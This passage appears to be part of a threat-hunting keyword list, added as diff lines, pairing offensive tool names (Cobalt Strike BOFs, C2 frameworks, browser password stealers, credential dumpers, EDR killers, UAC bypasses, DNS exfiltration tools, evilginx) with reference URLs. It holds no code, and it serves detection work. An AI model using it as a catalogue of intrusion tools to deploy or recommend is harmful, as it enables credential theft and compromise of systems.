VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"Browser VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"Browser-C2","https://github.com/0x09AL/Browser-C2" +"Browser-password-stealer","https://github.com/henry-richard7/Browser-password-stealer" +"bruteratel","https://bruteratel.com/" +"BruteSploit","https://github.com/screetsec/Vegile" +"BruteSploit","https://github.com/screetsec/Microsploit" +"BruteSploit","https://github.com/screetsec/BruteSploit" +"brutespray","https://github.com/x90skysn3k/brutespray" +"BruteX","https://github.com/1N3/BruteX" +"BucketLoot","https://github.com/redhuntlabs/BucketLoot" +"bulletpassview","https://www.nirsoft.net/utils/bullets_password_view.html" +"BullVPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"burpsuite","https://github.com/signorrayan/RedTeam_toolkit" +"burpsuite","https://github.com/nccgroup/BurpSuiteHTTPSmuggler" +"burpsuite","https://portswigger.net/burp" +"burpsuite","https://portswigger.net/" +"burpsuite","https://github.com/Mr-xn/BurpSuite-collections" +"burpsuite","https://github.com/infodel/burp.extension-payloadparser" +"burpsuite","https://github.com/attackercan/burp-xss-sql-plugin" +"burpsuite","https://github.com/laconicwolf/burp-extensions" +"burpsuite","https://github.com/JGillam/burp-co2" +"byob","https://github.com/malwaredllc/byob" +"BYOVD_kill_av_edr","https://github.com/infosecn1nja/red-team-scripts/blob/main/BYOVD_kill_av_edr.c" +"BypassCredGuard","https://github.com/wh0amitz/BypassCredGuard" +"bypasswaf","https://github.com/codewatchorg/bypasswaf" +"C2 related tools","https://github.com/mgeeky/ShellcodeFluctuation" +"C2 related tools","https://github.com/mgeeky/ThreadStackSpoofer" +"C2 related tools","https://github.com/Rvn0xsy/Cooolis-ms" +"C2 related tools","https://github.com/med0x2e/SigFlip" +"C2 related tools","https://github.com/aeverj/NimShellCodeLoader" +"C2 related tools","https://github.com/bitsadmin/nopowershell" +"C2 related tools","https://github.com/Ed1s0nZ/cool" +"C2_Server","https://github.com/reveng007/C2_Server" +"C2concealer","https://github.com/RedSiege/C2concealer" +"C2-Tool-Collection","https://github.com/outflanknl/C2-Tool-Collection" +"CACTUSTORCH","https://github.com/mdsecactivebreach/CACTUSTORCH" +"Cain&Abel","https://github.com/undergroundwires/CEH-in-bullet-points/blob/master/chapters/08-sniffing/sniffing-tools.md" +"CandyPotato","https://github.com/klezVirus/CandyPotato" +"CarbonCopy","https://github.com/paranoidninja/CarbonCopy" +"cat","N/A" +"cat","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md" +"catphish","https://github.com/ring0lab/catphish" +"cdn-proxy","https://github.com/RyanJarv/cdn-proxy" +"celerystalk","https://github.com/sethsec/celerystalk" +"cerbrutus","https://github.com/Cerbrutus-BruteForcer/cerbrutus" +"Certipy","https://github.com/ly4k/Certipy" +"CertStealer","https://github.com/TheWover/CertStealer" +"certsync","https://github.com/zblurx/certsync" +"changeme","https://github.com/ztgrace/changeme" +"chaos","https://blog.qualys.com/vulnerabilities-threat-research/2022/01/17/the-chaos-ransomware-can-be-ravaging" +"charles-proxy","https://charlesproxy.com/" +"charlotte","https://github.com/9emin1/charlotte" +"chcp","https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/" +"CheckPlease","https://github.com/Arvanaghi/CheckPlease" +"CheeseTools","https://github.com/klezVirus/CheeseTools" +"chimera","https://github.com/tokyoneon/Chimera/" +"Chimera","https://github.com/georgesotiriadis/Chimera" +"chisel","https://github.com/jpillora/chisel" +"ChkNull","https://github.com/nyxgeek/classic_hacking_tools" +"chromedump","https://github.com/g4l4drim/ChromeDump" +"chromepass","https://www.nirsoft.net/utils/chromepass.html" +"chromium","https://www.splunk.com/en_us/blog/security/mockbin-and-the-art-of-deception-tracing-adversaries-going-headless-and-mocking-apis.html" +"chromium","https://www.mandiant.com/resources/blog/lnk-between-browsers" +"chromium","https://redcanary.com/blog/intelligence-insights-june-2023/" +"CIMplant","https://github.com/RedSiege/CIMplant" +"cirt-fuzzer","https://www.ecrimelabs.com/" +"cloakify","https://github.com/TryCatchHCF/Cloakify" +"CloakNDaggerC2","https://github.com/matt-culbert/CloakNDaggerC2" +"Cloud VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"cloud_enum","https://github.com/initstring/cloud_enum" +"cloudsploit","https://github.com/aquasecurity/cloudsploit" +"CMSeek","https://github.com/Tuhinshubhra/CMSeek" +"cobaltstrike","https://github.com/outflanknl/Recon-AD" +"cobaltstrike","https://github.com/outflanknl/InlineWhispers" +"cobaltstrike","https://github.com/outflanknl/Spray-AD" +"cobaltstrike","https://github.com/p292/Phant0m_cobaltstrike" +"cobaltstrike","https://github.com/outflanknl/WdToggle" +"cobaltstrike","https://github.com/outflanknl/FindObjects-BOF" +"cobaltstrike","https://github.com/optiv/Dent" +"cobaltstrike","https://github.com/OneHone/C--Shellcode" +"cobaltstrike","https://github.com/optiv/Registry-Recon" +"cobaltstrike","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor" +"cobaltstrike","https://github.com/optiv/ScareCrow" +"cobaltstrike","https://github.com/RiccardoAncarani/BOFs" +"cobaltstrike","https://github.com/realoriginal/beacon-object-file" +"cobaltstrike","https://github.com/RiccardoAncarani/LiquidSnake" +"cobaltstrike","https://github.com/rkervella/CarbonMonoxide" +"cobaltstrike","https://github.com/RiccardoAncarani/TaskShell" +"cobaltstrike","https://github.com/RCStep/CSSG" +"cobaltstrike","https://github.com/pureqh/bypassAV" +"cobaltstrike","https://github.com/praetorian-inc/PortBender" +"cobaltstrike","https://github.com/pwn1sher/CS-BOFs" +"cobaltstrike","https://github.com/rasta-mouse/TikiTorch" +"cobaltstrike","https://github.com/rasta-mouse/PPEnum" +"cobaltstrike","https://github.com/OG-Sadpanda/SharpZippo" +"cobaltstrike","https://github.com/netero1010/RDPHijack-BOF" +"cobaltstrike","https://github.com/netero1010/Quser-BOF" +"cobaltstrike","https://github.com/netero1010/ServiceMove-BOF" +"cobaltstrike","https://github.com/nettitude/RunOF" +"cobaltstrike","https://github.com/netero1010/TrustedPath-UACBypass-BOF" +"cobaltstrike","https://github.com/nccgroup/nccfsas/" +"cobaltstrike","https://github.com/mlcsec/ASRenum-BOF" +"cobaltstrike","https://github.com/mgeeky/RedWarden" +"cobaltstrike","https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF" +"cobaltstrike","https://github.com/nccgroup/nccfsas" +"cobaltstrike","https://github.com/Mr-Un1k0d3r/SCShell" +"cobaltstrike","https://github.com/OG-Sadpanda/SharpCalendar" +"cobaltstrike","https://github.com/offsecginger/AggressorScripts" +"cobaltstrike","https://github.com/OG-Sadpanda/SharpCat" +"cobaltstrike","https://github.com/OG-Sadpanda/SharpSword" +"cobaltstrike","https://github.com/OG-Sadpanda/SharpExcelibur" +"cobaltstrike","https://github.com/Octoberfest7/KillDefender_BOF" +"cobaltstrike","https://github.com/NtQuerySystemInformation/CustomKeyboardLayoutPersistence" +"cobaltstrike","https://github.com/nick-frischkorn/TokenStripBOF" +"cobaltstrike","https://github.com/obscuritylabs/RAI" +"cobaltstrike","https://github.com/Octoberfest7/KDStab" +"cobaltstrike","https://github.com/Octoberfest7/EventViewerUAC_BOF" +"cobaltstrike","https://github.com/rookuu/BOFs" +"cobaltstrike","https://github.com/Unknow101/FuckThatPacker" +"cobaltstrike","https://github.com/uknowsec/TailorScan" +"cobaltstrike","https://github.com/vysecurity/ANGRYPUPPY" +"cobaltstrike","https://github.com/WKL-Sec/HiddenDesktop" +"cobaltstrike","https://github.com/wahyuhadi/beacon-c2-go" +"cobaltstrike","https://github.com/Tylous/SourcePoint" +"cobaltstrike","https://github.com/trustedsec/CS-Situational-Awareness-BOF" +"cobaltstrike","https://github.com/trustedsec/CS-Remote-OPs-BOF" +"cobaltstrike","https://github.com/trustedsec/ELFLoader" +"cobaltstrike","https://github.com/Tycx2ry/SweetPotato_CS" +"cobaltstrike","https://github.com/trustedsec/PPLFaultDumpBOF" +"cobaltstrike","https://github.com/YDHCUI/csload.net" +"cobaltstrike","https://github.com/Yaxser/COFFLoader2" +"cobaltstrike","https://github.com/YDHCUI/manjusaka" +"cobaltstrike","https://www.cobaltstrike.com/" +"cobaltstrike","https://github.com/zha0gongz1/DesertFox" +"cobaltstrike","https://github.com/Yaxser/CobaltStrike-BOF" +"cobaltstrike","https://github.com/wumb0/rust_bof" +"cobaltstrike","https://github.com/WKL-Sec/Winsocky" +"cobaltstrike","https://github.com/xforcered/CredBandit" +"cobaltstrike","https://github.com/yanghaoi/CobaltStrike_CNA" +"cobaltstrike","https://github.com/xforcered/Detect-Hooks" +"cobaltstrike","https://github.com/trustedsec/COFFLoader" +"cobaltstrike","https://github.com/securifybv/Visual-Studio-BOF-template" +"cobaltstrike","https://github.com/S3cur3Th1sSh1t/Sharp-HackBrowserData" +"cobaltstrike","https://github.com/seventeenman/CallBackDump" +"cobaltstrike","https://github.com/SpiderLabs/SharpCompile" +"cobaltstrike","https://github.com/Sh0ckFR/InlineWhispers2" +"cobaltstrike","https://github.com/rxwx/cs-rdll-ipc-example" +"cobaltstrike","https://github.com/rsmudge/Malleable-C2-Profiles" +"cobaltstrike","https://github.com/rsmudge/ElevateKit" +"cobaltstrike","https://github.com/rsmudge/unhook-bof" +"cobaltstrike","https://github.com/rvrsh3ll/BOF_Collection" +"cobaltstrike","https://github.com/rsmudge/ZeroLogon-BOF" +"cobaltstrike","https://github.com/timwhitez/Doge-Loader" +"cobaltstrike","https://github.com/tijme/kernel-mii" +"cobaltstrike","https://github.com/tomcarver16/BOF-DLL-Inject" +"cobaltstrike","https://github.com/trainr3kt/Readfile_BoF" +"cobaltstrike","https://github.com/trainr3kt/MemReader_BoF" +"cobaltstrike","https://github.com/threatexpress/red-team-scripts" +"cobaltstrike","https://github.com/tevora-threat/PowerView3-Aggressor" +"cobaltstrike","https://github.com/tevora-threat/aggressor-powerview" +"cobaltstrike","https://github.com/threatexpress/cs2modrewrite" +"cobaltstrike","https://github.com/threatexpress/random_c2_profile" +"cobaltstrike","https://github.com/threatexpress/malleable-c2" +"cobaltstrike","https://github.com/C0axx/AggressorScripts" +"cobaltstrike","https://github.com/byt3bl33d3r/BOF-Nim" +"cobaltstrike","https://github.com/CCob/BOF.NET" +"cobaltstrike","https://github.com/Cobalt-Strike/beacon_health_check" +"cobaltstrike","https://github.com/ceramicskate0/BOF-Builder" +"cobaltstrike","https://github.com/BronzeTicket/ClipboardWindow-Inject" +"cobaltstrike","https://github.com/boku7/injectEtwBypass" +"cobaltstrike","https://github.com/boku7/injectAmsiBypass" +"cobaltstrike","https://github.com/boku7/spawn" +"cobaltstrike","https://github.com/boku7/xPipe" +"cobaltstrike","https://github.com/boku7/whereami" +"cobaltstrike","https://github.com/CrossC2/CrossC2Kit" +"cobaltstrike","https://github.com/crisprss/PrintSpoofer" +"cobaltstrike","https://github.com/crypt0p3g/bof-collection" +"cobaltstrike","https://github.com/DallasFR/Cobalt-Clip" +"cobaltstrike","https://github.com/cube0x0/LdapSignCheck" +"cobaltstrike","https://github.com/cribdragg3r/Alaris" +"cobaltstrike","https://github.com/Cobalt-Strike/unhook-bof" +"cobaltstrike","https://github.com/Cobalt-Strike/sleep_python_bridge" +"cobaltstrike","https://github.com/CodeXTF2/Burp2Malleable" +"cobaltstrike","https://github.com/Cracked5pider/CoffeeLdr" +"cobaltstrike","https://github.com/connormcgarr/tgtdelegation" +"cobaltstrike","https://github.com/boku7/HOLLOW" +"cobaltstrike","https://github.com/Adminisme/ServerScan" +"cobaltstrike","https://github.com/1135/1135-CobaltStrike-ToolKit" +"cobaltstrike","https://github.com/airbus-cert/Invoke-Bof" +"cobaltstrike","https://github.com/alfarom256/BOF-ForeignLsass" +"cobaltstrike","https://github.com/ajpc500/BOFs" +"cobaltstrike","https://github.com/0xthirteen/StayKit" +"cobaltstrike","https://gist.github.com/G0ldenGunSec/8ca0e853dd5637af2881697f8de6aecc" +"cobaltstrike","https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/" +"cobaltstrike","https://github.com//EspressoCake/HandleKatz_BOF" +"cobaltstrike","https://github.com/0xthirteen/MoveKit" +"cobaltstrike","https://github.com/0x3rhy/AddUser-Bof" +"cobaltstrike","https://github.com/Axx8/ShellCode_Loader" +"cobaltstrike","https://github.com/ausecwa/bof-registry" +"cobaltstrike","https://github.com/BC-SECURITY/Malleable-C2-Profiles" +"cobaltstrike","https://github.com/boku7/BokuLoader" +"cobaltstrike","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer" +"cobaltstrike","https://github.com/AttackTeamFamily/cobaltstrike-bof-toolset" +"cobaltstrike","https://github.com/anthemtotheego/Detect-Hooks" +"cobaltstrike","https://github.com/AlphabugX/csOnvps" +"cobaltstrike","https://github.com/anthemtotheego/InlineExecute-Assembly" +"cobaltstrike","https://github.com/apokryptein/secinject" +"cobaltstrike","https://github.com/anthemtotheego/SharpCradle" +"cobaltstrike","https://github.com/darkr4y/geacon" +"cobaltstrike","https://github.com/Henkru/cs-token-vault" +"cobaltstrike","https://github.com/Hangingsword/HouQing" +"cobaltstrike","https://github.com/IcebreakerSecurity/DelegationBOF" +"cobaltstrike","https://github.com/idiotc4t/Reflective-HackBrowserData" +"cobaltstrike","https://github.com/IcebreakerSecurity/PersistBOF" +"cobaltstrike","https://github.com/hack2fun/BypassAV" +"cobaltstrike","https://github.com/GeorgePatsias/ScareCrow-CobaltStrike" +"cobaltstrike","https://github.com/Gality369/CS-Loader" +"cobaltstrike","https://github.com/GhostPack/Koh" +"cobaltstrike","https://github.com/guervild/BOFs" +"cobaltstrike","https://github.com/gloxec/CrossC2" +"cobaltstrike","https://github.com/m57/cobaltstrike_bofs" +"cobaltstrike","https://github.com/lengjibo/NetUser" +"cobaltstrike","https://github.com/mdsecactivebreach/CACTUSTORCH" +"cobaltstrike","https://github.com/mez-0/winrmdll" +"cobaltstrike","https://github.com/med0x2e/SigFlip" +"cobaltstrike","https://github.com/kyleavery/inject-assembly" +"cobaltstrike","https://github.com/jas502n/bypassAV-1" +"cobaltstrike","https://github.com/improsec/SharpEventPersist" +"cobaltstrike","https://github.com/k8gege/Ladon" +"cobaltstrike","https://github.com/kyleavery/AceLdr" +"cobaltstrike","https://github.com/k8gege/scrun" +"cobaltstrike","https://github.com/G0ldenGunSec/GetWebDAVStatus" +"cobaltstrike","https://github.com/EncodeGroup/BOF-RegSave" +"cobaltstrike","https://github.com/EncodeGroup/AggressiveProxy" +"cobaltstrike","https://github.com/EncodeGroup/UAC-SilentClean" +"cobaltstrike","https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF" +"cobaltstrike","https://github.com/EspressoCake/DLL_Imports_BOF" +"cobaltstrike","https://github.com/eddiezab/aggressor-scripts/tree/master" +"cobaltstrike","https://github.com/dcsync/pycobalt" +"cobaltstrike","https://github.com/Daybr4ak/C2ReverseProxy" +"cobaltstrike","https://github.com/DeEpinGh0st/Erebus" +"cobaltstrike","https://github.com/dtmsecurity/bof_helper" +"cobaltstrike","https://github.com/dr0op/CrossNet-Beta" +"cobaltstrike","https://github.com/ewby/Mockingjay_BOF" +"cobaltstrike","https://github.com/EspressoCake/Toggle_Token_Privileges_BOF" +"cobaltstrike","https://github.com/FalconForceTeam/BOF2shellcode" +"cobaltstrike","https://github.com/FunnyWolf/pystinger" +"cobaltstrike","https://github.com/fcre1938/goShellCodeByPassVT" +"cobaltstrike","https://github.com/EspressoCake/Self_Deletion_BOF" +"cobaltstrike","https://github.com/EspressoCake/HandleKatz_BOF" +"cobaltstrike","https://github.com/EspressoCake/Firewall_Walker_BOF" +"cobaltstrike","https://github.com/EspressoCake/Needle_Sift_BOF" +"cobaltstrike","https://github.com/EspressoCake/Process_Protection_Level_BOF" +"cobaltstrike","https://github.com/EspressoCake/PPLDump_BOF" +"Coercer","https://github.com/p0dalirius/Coercer" +"combine_harvester","https://github.com/m3f157O/combine_harvester" +"COMHunter","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter" +"COM-Hunter","https://github.com/nickvourd/COM-Hunter" +"commando-vm","https://github.com/mandiant/commando-vm" +"commix","https://github.com/commixproject/commix" +"ConPtyShell","https://github.com/antonioCoco/ConPtyShell" +"ContainYourself","https://github.com/deepinstinct/ContainYourself" +"conti","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/" +"Conti Ranwomware","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/" +"copy","N/A" +"copy","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF" +"covenant","https://github.com/cobbr/Covenant" +"Cowpatty","https://github.com/joswr1ght/cowpatty" +"cp","N/A" +"Cr3dOv3r","https://github.com/D4Vinci/Cr3dOv3r" +"crack.sh","https://crack.sh/get-cracking/" +"Crack-allDBs","https://github.com/d3ckx1/Crack-allDBs" +"cracklord","https://github.com/jmmcatee/cracklord" +"crackmapexec","https://github.com/Porchetta-Industries/CrackMapExec" +"crackmapexec","https://github.com/byt3bl33d3r/CrackMapExec" +"crackpkcs12","https://github.com/crackpkcs12/crackpkcs12" +"Crassus","https://github.com/vu-ls/Crassus" +"CredPhisher","https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher" +"CredsLeaker","https://github.com/Dviros/CredsLeaker" +"crond","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/auditd/lnx_auditd_masquerading_crond.yml" +"Cronos-Rootkit","https://github.com/XaFF-XaFF/Cronos-Rootkit" +"crontab","N/A" +"crossc2","https://github.com/gloxec/CrossC2" +"CrossLinked","https://github.com/m8r0wn/CrossLinked" +"Crowbar","https://github.com/galkan/crowbar" +"crunch","https://sourceforge.net/projects/crunch-wordlist/" +"crypto_identifier","https://github.com/Acceis/crypto_identifier" +"CSExec","https://github.com/Metro-Holografix/CSExec.py" +"csploit","https://github.com/cSploit/android" +"ctfr","https://github.com/UnaPibaGeek/ctfr" +"ctftool","https://github.com/taviso/ctftool" +"cuddlephish","https://github.com/fkasler/cuddlephish" +"curlshell","https://github.com/irsl/curlshell" +"cut","N/A" +"CyberGhost VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"cytool","N/A" +"D1rkInject","https://github.com/TheD1rkMtr/D1rkInject" +"Daily VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"DAMP","https://github.com/HarmJ0y/DAMP" +"daphne","https://github.com/codewhitesec/daphne" +"darkarmour","https://github.com/bats3c/darkarmour" +"DarkLoadLibrary","https://github.com/bats3c/DarkLoadLibrary" +"DarkWidow","https://github.com/reveng007/DarkWidow" +"datasploit","https://github.com/dvopsway/datasploit" +"DavRelayUp","https://github.com/ShorSec/DavRelayUp" +"dazzleUP","https://github.com/hlldz/dazzleUP" +"DBC2","https://github.com/Arno0x/DBC2" +"dcipher-cli","https://github.com/k4m4/dcipher-cli" +"dcomhijack","https://github.com/WKL-Sec/dcomhijack" +"DCOMPotato","https://github.com/zcgonvh/DCOMPotato" +"DcRat","https://github.com/qwqdanchun/DcRat" +"dd","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.yaml" +"DeathStar","https://github.com/byt3bl33d3r/DeathStar" +"DebugAmsi","https://github.com/MzHmO/DebugAmsi" +"debugdfs","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md" +"decrypt-chrome-passwords","https://github.com/ohyicong/decrypt-chrome-passwords" +"DEEPRISM VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"DefaultCreds-cheat-sheet","https://github.com/ihebski/DefaultCreds-cheat-sheet" +"DefenderCheck","https://github.com/rasta-mouse/ThreatCheck" +"DefenderCheck","https://github.com/matterpreter/DefenderCheck" +"deimosc2","https://github.com/DeimosC2/DeimosC2" +"DelegationBOF","https://github.com/IcebreakerSecurity/DelegationBOF" +"demiguise","https://github.com/nccgroup/demiguise" +"Dendrobate","https://github.com/FuzzySecurity/Dendrobate" +"DesertNut","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/DesertNut" +"dev-tunnels","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview" +"DFSCoerce","https://github.com/Wh04m1001/DFSCoerce" +"dialupass","https://www.nirsoft.net/utils/dialupass.html" +"dig","https://linux.die.net/man/1/dig" +"Dinjector","https://github.com/Metro-Holografix/DInjector" +"dir","https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/" +"dir","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference" +"dirbuster","https://github.com/vulnersCom/burp-Dirbuster" +"DirCreate2System","https://github.com/binderlabs/DirCreate2System" +"Direct-Syscalls","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls" +"dirscraper","https://github.com/Cillian-Collins/dirscraper" +"dirsearch","https://github.com/maurosoria/dirsearch" +"dirtycow","multiple pocs on github and others places " +"dirty-pipe","https://github.com/0xIronGoat/dirty-pipe" +"disctopia-c2","https://github.com/3ct0s/disctopia-c2" +"DiskCryptor","https://github.com/DavidXanatos/DiskCryptor" +"diskshadow","N/A" +"DllNotificationInjection","https://github.com/ShorSec/DllNotificationInjection" +"DllProxy","https://github.com/Iansus/DllProxy/" +"dns","https://github.com/ossec/ossec-hids/blob/master/etc/rules/named_rules.xml" +"dnscan","https://github.com/rbsec/dnscan" +"dnscat","https://github.com/iagox86/dnscat2" +"dnscat2","https://github.com/iagox86/dnscat2" +"dnscmd","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF" +"dnsdumpster","https://dnsdumpster.com/" +"dnsenum","https://github.com/fwaeytens/dnsenum" +"DNSExfiltrator","https://github.com/Arno0x/DNSExfiltrator" +"dnsmorph","https://github.com/netevert/dnsmorph" +"DNS-Persist","https://github.com/0x09AL/DNS-Persist" +"dnsrecon","https://github.com/darkoperator/dnsrecon" +"dnsteal","https://github.com/m57/dnsteal" +"DNSTracer","https://github.com/pcoder/DNSTracer" +"dnstwist","https://github.com/elceef/dnstwist" +"DockerPwn","https://github.com/AbsoZed/DockerPwn.py" +"DocPlz","https://github.com/TheD1rkMtr/DocPlz" +"DoHC2","https://github.com/SpiderLabs/DoHC2" +"domain_analyzer","https://github.com/eldraco/domain_analyzer" +"domained","https://github.com/TypeError/domained" +"domainhunter","https://github.com/threatexpress/domainhunter" +"DomainPasswordSpray","https://github.com/dafthack/DomainPasswordSpray" +"DOME","https://github.com/v4d1/Dome" +"donpapi","https://github.com/login-securite/DonPAPI" +"donut","https://github.com/TheWover/donut" +"dos-over-tor","https://github.com/skizap/dos-over-tor" +"DotVPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"DoubleAgent","https://github.com/Cybellum/DoubleAgent" +"dpapi.py","N/A" +"dploot","https://github.com/zblurx/dploot" +"Dr0p1t-Framework","https://github.com/D4Vinci/Dr0p1t-Framework" +"DriverQuery","https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery" +"Droopscan","https://github.com/droope/droopescan" +"Drupwn","https://github.com/immunIT/drupwn" +"dsniff","https://github.com/tecknicaltom/dsniff" +"dsquery","N/A" +"dsquery","https://www.politoinc.com/post/ldap-queries-for-offensive-and-defensive-operations" +"dtd-finder","https://github.com/GoSecure/dtd-finder" +"ducktail","https://www.trendmicro.com/en_be/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html" +"ducky","https://github.com/greghanley/ducky-decode-wiki/blob/master/Guide_Change_USB_VID_PID.wiki" +"DueDLLigence","https://github.com/mandiant/DueDLLigence" +"DumpCreds","https://github.com/ponypot/dumpcreds" +"Dumpert","https://github.com/outflanknl/Dumpert" +"DumpsterFire","https://github.com/TryCatchHCF/DumpsterFire" +"EAPHammer","https://github.com/s0lst1c3/eaphammer" +"Earth Lusca Operations Tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf" +"Earth Lusca Operations Tools ","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/RickGeex/ProxyLogon" +"Earth Lusca Operations Tools ","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1" +"Earth Lusca Operations Tools ","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/BeichenDream/BadPotato" +"Earth Lusca Operations Tools ","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/dmaasland/proxyshell-poc" +"Earth VPN","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml" +"Ebowla","https://github.com/Genetic-Malware/Ebowla" +"echo","N/A" +"echo","https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/" +"echo","https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_meterpreter_or_cobaltstrike_getsystem_service_start.yml" +"echoac-poc","https://github.com/kite03/echoac-poc" +"EDRaser","https://github.com/SafeBreach-Labs/EDRaser" +"EDRSandBlast","https://github.com/wavestone-cdt/EDRSandblast" +"EDRSandblast-GodFault","https://github.com/gabriellandau/EDRSandblast-GodFault" +"EDR-Test","https://github.com/TH3xACE/EDR-Test" +"EfsPotato","https://github.com/zcgonvh/EfsPotato" +"Eggshell","https://github.com/neoneggplant/EggShell" +"Egress-Assess","https://github.com/FortyNorthSecurity/Egress-Assess" +"egressbuster","https://github.com/trustedsec/egressbuster" +"elastic-agent","N/A" +"elevationstation","https://github.com/g3tsyst3m/elevationstation" +"elite-proxy-finder","https://github.com/DanMcInerney/elite-proxy-finder" +"EmailAll","https://github.com/Taonn/EmailAll" +"email-format","https://www.email-format.com" +"EmbedInHTML","https://github.com/Arno0x/EmbedInHTML" +"empire","https://github.com/EmpireProject/Empire-GUI" +"empire","https://github.com/PowerShellEmpire/PowerTools" +"empire","https://www.powershellempire.com/" +"empire","https://github.com/BC-SECURITY/Empire" +"empire","https://github.com/BC-SECURITY/Starkiller" +"empire","https://github.com/EmpireProject/Empire" +"EncryptedZIP","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP" +"enum4linux","https://github.com/CiscoCXSecurity/enum4linux" +"EQGR","https://fdik.org/EQGRP/Linux/doc/old/etc/user.tool.elgingamble.COMMON" +"EQGR","https://fdik.org/EQGRP/Linux/doc/old/etc/abopscript.txt" +"EQGRP tools","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386" +"EQGRP tools","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/emptybowl.py" +"EQGRP tools","https://github.com/x0rz/EQGRP/blob/master/Linux/doc/old/etc/user.tool.dubmoat.COMMON" +"EQGRP tools","https://github.com/x0rz/EQGRP/tree/master/Linux/bin" +"EQGRP tools","https://github.com/x0rz/EQGRP/blob/master/Linux/doc/user.tool.elatedmonkey" +"EQGRP tools","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1" +"EQGRP tools","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/Auditcleaner" +"EQGRP tools","https://github.com/thePevertedSpartan/EQ1/blob/0c2354ff1073099b2aa417030b3167ec29d7279c/Linux/doc/old/etc/user.tool.poptop.COMMON" +"EQGRP tools","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/echowrecker" +"EQGRP tools","https://github.com/wolf-project/NSA-TOOLS-SHADOW-BROKERS" +"Eternalblue-Doublepulsar-Metasploit","https://github.com/Telefonica/Eternalblue-Doublepulsar-Metasploit" +"EternalHushFramework","https://github.com/APT64/EternalHushFramework" +"ETW","https://gist.github.com/xpn/64e5b6f7ad370c343e3ab7e9f9e22503" +"ETWEventSubscription","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription" +"ETWHash","https://github.com/nettitude/ETWHash" +"EventViewer-UACBypass","https://github.com/CsEnox/EventViewer-UACBypass" +"EvilClippy","https://github.com/outflanknl/EvilClippy" +"evilginx","https://github.com/kgretzky/evilginx2" +"evilginx2","https://github.com/kgretzky/evilginx2" 